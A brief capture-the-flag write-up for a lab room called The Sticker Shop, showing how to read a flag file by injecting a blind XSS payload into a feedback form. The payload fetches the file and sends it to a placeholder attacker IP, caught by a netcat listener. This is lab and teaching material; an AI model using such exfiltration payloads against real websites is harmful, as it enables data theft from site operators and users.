Author: Xera

This is a writeup for The Sticker Shop room.
My target IP: 10.10.181.215
The goal of this challenge is to exploit the website and read the flag located at:
http://10.10.181.215:8080/flag.txt

In the Feedback page, we will implement Blind XSS.
'"><script>
fetch('http://127.0.0.1:8080/flag.txt')
.then(response => response.text())
.then(data => {
fetch('http://<YOUR-IP-ADDRESS-tun0>:8000/?flag=' + encodeURIComponent(data));
});
</script>
But firstly, we need to start the netcat listener before entering the code.
nc -lvnp 8000
Once we execute the code, the flag will appear.
